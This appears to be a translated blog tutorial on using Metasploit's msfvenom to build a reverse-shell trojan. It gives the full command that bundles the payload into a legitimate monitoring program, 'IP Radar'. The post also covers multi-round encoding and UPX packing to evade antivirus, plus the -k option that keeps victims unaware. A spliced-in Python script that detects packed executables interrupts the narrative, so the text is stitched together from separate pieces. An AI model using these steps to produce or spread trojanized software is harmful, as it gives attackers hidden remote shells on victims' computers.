Metasploit for Trojan generation, bundling and AV evasion

Source: Internet
Author: User
Tags: kali linux radar

Metasploit Introduction

Metasploit is an excellent open-source (open source != completely free) penetration-testing framework. Penetration tests can be carried out conveniently on it; Metasploit offers a wide range of interfaces, modules and so on, and even lets users write their own modules. Within the Metasploit framework, Trojan generation, bundling and AV evasion can all be done conveniently. The Lab Building website has this course, but it is paid, how frustrating,,,, so,,,, :)

0x01 Select the attack payload

First, open a terminal and type "msfconsole" to enter the Metasploit console.

Type "show payloads" to view information on all available attack payloads.
The payload list shown below is every available attack payload.

The payload I used is named shell_reverse_tcp. It is a simple reverse shell: its function is to obtain the command line of the compromised host (whose system is Windows). Of course, other payloads can be used to achieve different functions.

0x02 Select the file to bundle

One of the functions implemented in this experiment is bundling the Trojan into another executable file, so that the Trojan infects and spreads more easily. In fact, Metasploit ships with a program template of its own, located at data/templates/template.exe. Although this template is updated often, it is still a focus of the major anti-virus vendors. To achieve better AV evasion, I chose a program of my own to bundle with. The program template I chose is "IP Radar"; IP Radar is a common and excellent system resource monitoring program. (The program to bundle was chosen at random; it will be removed if this infringes.)
qqwry.dat is the IP address database of IP Radar and has nothing to do with this experiment.

0x03 About AV evasion

AV evasion is a very important technique (other techniques are important too). I think a real hacker would not be satisfied with just using other people's software for evasion; writing your own packer is safer than grabbing a packing tool straight from the Internet. Common evasion methods are: modifying the signature, modifying the program entry point, junk instructions, packing, and so on. (For an introduction to AV evasion I recommend "Hacker AV Evasion: Attack and Defense" by Ning; this book is a classic from primer to advanced, and its author is a member of Evil Octal, oh :))
Back to the topic: one of the ways to achieve AV evasion under the Metasploit framework is to use the MSF encoder. Its function is to re-arrange our payload file and change the shape of the code inside the executable so that anti-virus software does not recognise it. You can type "msfvenom -l encoders" at the terminal to see all available encoding methods. Note that not all encoding methods are available on Windows. The encoding method I chose here is x86/shikata_ga_nai.


0x04 Trojan generation/bundling/AV evasion

Lab environment:
Attacker IP: 192.168.159.134, system: Kali Linux
Target machine IP: 169.254.113.77, system: Win7 (security software: 360, COMODO)

The Trojan generation/bundling/evasion operation is as follows:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.159.134 LPORT=8080 -e x86/shikata_ga_nai -x IPradar5.exe -i 5 -f exe -o /root/desktop/backdoor.exe

-p windows/shell_reverse_tcp: use the shell_reverse_tcp attack payload
LHOST=192.168.159.134: set the attacker's IP address
LPORT=8080: set the attacker's listening port, which receives the Trojan's connection request
-e x86/shikata_ga_nai: re-encode the attack payload with the shikata_ga_nai encoder
-x IPradar5.exe: bundle the Trojan into the specified executable program template, here IPradar5.exe
-i 5: run the encoder just chosen 5 times over the payload (multiple rounds of encoding theoretically help evasion, but not necessarily; after all, the anti-virus vendors are not idle ....)
-f exe: specify the MSF encoder's output format as exe
-o /root/desktop/backdoor.exe: specify the output path of the file once processing is complete

At this point, generating, bundling and evasion for the Trojan program are all done,,,,, isn't it very simple .... There is basically no technical content to speak of ....

Test below:
First set up MSF, set it to listen on 8080, and wait for the Trojan to connect.

This is embarrassing ....

Not willing to give up .... I then packed the program just generated.
At the terminal, type upx to see the parameters of the UPX packing tool.

Type the command: upx -5 backdoor.exe. This packs backdoor.exe (here it is compression). The drawback of packing is that it changes the size of the source file, and experienced security personnel can easily spot this difference .... Rename it to 1backdoor.exe.
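The size change the post just mentioned is only the most visible trace; a reviewer looking at the packed file would also notice the UPX section names and the near-8-bit entropy of compressed or encoded sections (the encoder rounds in 0x04 leave the same kind of trace). As an added example, not code from the original post, the dependency-free Python below walks a PE's section table and reports both indicators; build_fake_pe constructs a minimal, non-runnable PE image so the check can be exercised offline without a real binary.

```python
import math
import struct

# Section names that the UPX packer writes into a packed executable.
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b"UPX!"}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: plain x86 code sits around 5-6, packed or encoded data near 8."""
    n = len(data)
    counts = [data.count(v) for v in range(256)]
    return -sum(c / n * math.log2(c / n) for c in counts if c) if n else 0.0

def pe_sections(pe: bytes) -> list:
    """Minimal PE section-table walk (no pefile needed): [(name, raw_bytes), ...]."""
    coff = struct.unpack_from("<I", pe, 0x3C)[0] + 4  # e_lfanew, then skip 'PE\0\0'
    if pe[:2] != b"MZ" or pe[coff - 4:coff] != b"PE\0\0":
        raise ValueError("not a PE image")
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size  # 20-byte COFF header, then the optional header
    out = []
    for i in range(num_sections):
        hdr = table + 40 * i  # each IMAGE_SECTION_HEADER is 40 bytes
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)
        out.append((pe[hdr:hdr + 8].rstrip(b"\0"), pe[raw_ptr:raw_ptr + raw_size]))
    return out

def packing_indicators(pe: bytes, entropy_threshold: float = 7.0) -> dict:
    """What a triage analyst records: UPX section names and sections that look encoded."""
    sections = pe_sections(pe)
    return {
        "upx_sections": [n.decode() for n, _ in sections if n in UPX_SECTION_NAMES],
        "high_entropy_sections": [n.decode() for n, d in sections
                                  if shannon_entropy(d) > entropy_threshold],
    }

def build_fake_pe(sections: list) -> bytes:
    """Constructed, minimal PE image for offline testing only; it is not a runnable program."""
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)  # SizeOfOptionalHeader = 0
    data_ptr = 0x40 + 4 + len(coff) + 40 * len(sections)
    table, blobs = b"", b""
    for name, data in sections:
        table += name.ljust(8, b"\0") + struct.pack("<IIII", len(data), 0, len(data), data_ptr) + b"\0" * 16
        blobs += data
        data_ptr += len(data)
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew -> 0x40
    return dos_header + b"PE\0\0" + coff + table + blobs
```

Run packing_indicators over a real file's bytes to get the same two lists; the constructed image in the test stands in for a sample.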

Scan again with 360.
The result is very embarrassing ....

360's virus database seems to be quite good .....
Upload the packed file to VirSCAN for a cloud anti-virus scan.

It can be seen that publicly available AV evasion tools are not that reliable. I also found that among VirSCAN's anti-virus engines, the Qihoo 360 engine is version 1.0.1,, the security companies are not idle, hmm ....

One more point: with the Trojan generation and bundling operation above, the host program that carries the Trojan does not start. If you want to hide the Trojan so that users do not realise the host program has a problem, you have to add the -k option to the Trojan generation command; this means the attack payload is launched in a separate process and the original host program runs unaffected.

The experiment ends here.
Lab partner: Yang Xiaodung 20179202

